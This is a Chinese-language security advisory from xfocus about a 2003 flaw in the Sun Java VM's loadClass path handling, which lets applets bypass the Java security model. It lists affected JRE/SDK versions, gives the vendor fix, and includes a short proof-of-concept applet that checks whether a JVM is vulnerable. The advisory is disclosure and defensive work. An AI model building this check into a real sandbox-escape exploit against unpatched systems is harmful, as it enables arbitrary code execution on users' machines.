xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Sun Java虚拟机路径处理绕过安全模型漏洞


发布时间:2003-10-22
更新时间:2003-11-06
严重程度:
威胁程度:普通用户访问权限
错误类型:设计错误
利用方式:服务器模式

BUGTRAQ ID:8879

受影响系统
HP HP-UX 11.0                                    
HP HP-UX 11.11                                  
HP HP-UX 11.22                                  
HP HP-UX 11.23                                  
Sun JRE (Linux Production Release) 1.2.2 _015    
Sun JRE (Linux Production Release) 1.2.2 _014    
Sun JRE (Linux Production Release) 1.2.2 _013    
Sun JRE (Linux Production Release) 1.2.2 _011    
Sun JRE (Linux Production Release) 1.2.2 _010    
Sun JRE (Linux Production Release) 1.2.2 _007    
Sun JRE (Linux Production Release) 1.2.2 _006    
Sun JRE (Linux Production Release) 1.2.2 _005    
   -Debian Linux 2.2                            
   -MandrakeSoft Linux Mandrake 7.2              
   -RedHat Linux 7.0                            
   -S.u.S.E. Linux 7.0                          
Sun JRE (Linux Production Release) 1.2.2 _004    
Sun JRE (Linux Production Release) 1.2.2 _003    
Sun JRE (Linux Production Release) 1.2.2        
Sun JRE (Linux Production Release) 1.3.1 _07    
Sun JRE (Linux Production Release) 1.3.1 _06    
Sun JRE (Linux Production Release) 1.3.1 _05    
Sun JRE (Linux Production Release) 1.3.1 _03    
   +Macromedia ColdFusion Server MX Developer    
   +Macromedia ColdFusion Server MX Enterprise  
   +Macromedia ColdFusion Server MX Professional
Sun JRE (Linux Production Release) 1.3.1 _02    
Sun JRE (Linux Production Release) 1.3.1 _01    
Sun JRE (Linux Production Release) 1.3.1        
Sun JRE (Linux Production Release) 1.4.1 _03    
Sun JRE (Linux Production Release) 1.4.1 _02    
Sun JRE (Linux Production Release) 1.4.1 _01    
   +Opera Software Opera Web Browser 7.11        
Sun JRE (Linux Production Release) 1.4.1        
Sun JRE (Reference Release) 1.2.2 _011          
Sun JRE (Reference Release) 1.2.2 _010          
Sun JRE (Solaris Production Release) 1.2.2 _014  
Sun JRE (Solaris Production Release) 1.2.2 _013  
Sun JRE (Solaris Production Release) 1.2.2 _012  
Sun JRE (Solaris Production Release) 1.2.2 _011  
Sun JRE (Solaris Production Release) 1.2.2 _010  
Sun JRE (Solaris Production Release) 1.2.2      
Sun JRE (Solaris Production Release) 1.3.1 _07  
Sun JRE (Solaris Production Release) 1.3.1 _06  
Sun JRE (Solaris Production Release) 1.3.1 _05  
Sun JRE (Solaris Production Release) 1.3.1 _04  
Sun JRE (Solaris Production Release) 1.3.1 _03  
   +Macromedia ColdFusion Server MX Developer    
   +Macromedia ColdFusion Server MX Enterprise  
   +Macromedia ColdFusion Server MX Professional
Sun JRE (Solaris Production Release) 1.3.1 _02  
Sun JRE (Solaris Production Release) 1.3.1 _01  
Sun JRE (Solaris Production Release) 1.4.1 _03  
Sun JRE (Solaris Production Release) 1.4.1 _02  
Sun JRE (Solaris Production Release) 1.4.1 _01  
   +Opera Software Opera Web Browser 7.11        
Sun JRE (Solaris Production Release) 1.4.1      
Sun JRE (Windows Production Release) 1.2.2 _015  
Sun JRE (Windows Production Release) 1.2.2 _014  
Sun JRE (Windows Production Release) 1.2.2 _013  
Sun JRE (Windows Production Release) 1.2.2 _011  
Sun JRE (Windows Production Release) 1.2.2 _010  
Sun JRE (Windows Production Release) 1.2.2      
Sun JRE (Windows Production Release) 1.3.1 _07  
Sun JRE (Windows Production Release) 1.3.1 _06  
Sun JRE (Windows Production Release) 1.3.1 _05  
Sun JRE (Windows Production Release) 1.3.1 _04  
Sun JRE (Windows Production Release) 1.3.1 _03  
   +Macromedia ColdFusion Server MX Developer    
   +Macromedia ColdFusion Server MX Enterprise  
   +Macromedia ColdFusion Server MX Professional
Sun JRE (Windows Production Release) 1.3.1 _02  
Sun JRE (Windows Production Release) 1.3.1 _01a  
Sun JRE (Windows Production Release) 1.3.1 _01  
Sun JRE (Windows Production Release) 1.4.1 _03  
Sun JRE (Windows Production Release) 1.4.1 _02  
Sun JRE (Windows Production Release) 1.4.1 _01  
   +Opera Software Opera Web Browser 7.11        
   +Opera Software Opera Web Browser 7.11 j      
Sun JRE (Windows Production Release) 1.4.1      
Sun JRE (Windows Production Release) 1.4.2 _01  
Sun SDK (Linux Production Release) 1.2.2 _13    
Sun SDK (Linux Production Release) 1.2.2 _12    
Sun SDK (Linux Production Release) 1.2.2 _015    
Sun SDK (Linux Production Release) 1.2.2 _014    
Sun SDK (Linux Production Release) 1.2.2 _011    
Sun SDK (Linux Production Release) 1.2.2 _010    
Sun SDK (Linux Production Release) 1.3.1 _07    
Sun SDK (Linux Production Release) 1.3.1 _06    
Sun SDK (Linux Production Release) 1.3.1 _05    
Sun SDK (Linux Production Release) 1.3.1 _03    
Sun SDK (Linux Production Release) 1.3.1 _02    
Sun SDK (Linux Production Release) 1.3.1 _01    
Sun SDK (Linux Production Release) 1.4.1 _03    
Sun SDK (Linux Production Release) 1.4.1 _02    
Sun SDK (Linux Production Release) 1.4.1 _01    
Sun SDK (Linux Production Release) 1.4.1        
Sun SDK (Solaris Production Release) 1.2.2 _14  
Sun SDK (Solaris Production Release) 1.2.2 _13  
Sun SDK (Solaris Production Release) 1.2.2 _12  
Sun SDK (Solaris Production Release) 1.2.2 _11  
Sun SDK (Solaris Production Release) 1.2.2 _10  
Sun SDK (Solaris Production Release) 1.2.2 _07a  
Sun SDK (Solaris Production Release) 1.2.2      
Sun SDK (Solaris Production Release) 1.3.1 _07  
Sun SDK (Solaris Production Release) 1.3.1 _06  
Sun SDK (Solaris Production Release) 1.3.1 _05  
Sun SDK (Solaris Production Release) 1.3.1 _03  
Sun SDK (Solaris Production Release) 1.3.1 _02  
Sun SDK (Solaris Production Release) 1.3.1 _01  
Sun SDK (Solaris Production Release) 1.4.1 _03  
Sun SDK (Solaris Production Release) 1.4.1 _02  
Sun SDK (Solaris Production Release) 1.4.1 _01  
Sun SDK (Solaris Production Release) 1.4.1      
Sun SDK (Solaris Reference Release) 1.2.2 _015  
Sun SDK (Solaris Reference Release) 1.2.2 _014  
Sun SDK (Solaris Reference Release) 1.2.2 _013  
Sun SDK (Solaris Reference Release) 1.2.2 _012  
Sun SDK (Solaris Reference Release) 1.2.2 _011  
Sun SDK (Solaris Reference Release) 1.2.2 _010  
Sun SDK (Windows Production Release) 1.2.2 _015  
Sun SDK (Windows Production Release) 1.2.2 _014  
Sun SDK (Windows Production Release) 1.2.2 _013  
Sun SDK (Windows Production Release) 1.2.2 _012  
Sun SDK (Windows Production Release) 1.2.2 _012  
Sun SDK (Windows Production Release) 1.2.2 _011  
Sun SDK (Windows Production Release) 1.2.2 _010  
Sun SDK (Windows Production Release) 1.3.1 _07  
Sun SDK (Windows Production Release) 1.3.1 _06  
Sun SDK (Windows Production Release) 1.3.1 _05  
Sun SDK (Windows Production Release) 1.3.1 _04  
Sun SDK (Windows Production Release) 1.3.1 _03  
Sun SDK (Windows Production Release) 1.3.1 _02  
Sun SDK (Windows Production Release) 1.3.1 _01a  
Sun SDK (Windows Production Release) 1.4.1 _03  
Sun SDK (Windows Production Release) 1.4.1 _02  
Sun SDK (Windows Production Release) 1.4.1 _01  
Sun SDK (Windows Production Release) 1.4.1
详细描述
Sun Java虚拟机在loadClass方法的实现上存在逻辑缺陷,攻击者可以利用此漏洞绕过Java的安全控制,在主机上执行任意代码。

测试代码
Alla Bezroutchko <alla@scanit.be>

import java.applet.Applet;
import java.awt.Graphics;
import java.lang.Class;
import java.security.AccessControlException;

public class Simple extends Applet {

StringBuffer buffer;

public void init() {
buffer = new StringBuffer();
}

public void start() {
ClassLoader cl = this.getClass().getClassLoader();
try {
Class cla =
cl.loadClass("sun/applet/AppletClassLoader"); // Note the slashes
addItem("No exception in loadClass. Vulnerable!");
} catch (ClassNotFoundException e) {
addItem("ClassNotFoundException in loadClass - " + e);
} catch (AccessControlException e) {
addItem("AccessControlException in loadClass - Not
Vulnerable!");
}

}

void addItem(String newWord) {
System.out.println(newWord);
buffer.append(newWord);
repaint();
}

public void paint(Graphics g) {
//Draw a Rectangle around the applet's display area.
g.drawRect(0, 0, size().width - 1, size().height - 1);

//Draw the current string inside the rectangle.
g.drawString(buffer.toString(), 5, 15);
}
}

解决方案
厂商已经在新版软件中修补了此漏洞:

http://java.sun.com/j2se/

相关信息
[LSD] Security vulnerability in SUN's Java Virtual Machine implementation
http://archives.neohapsis.com/archives/bugtraq/2003-10/0223.html

Sun Alert ID: 57221
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57221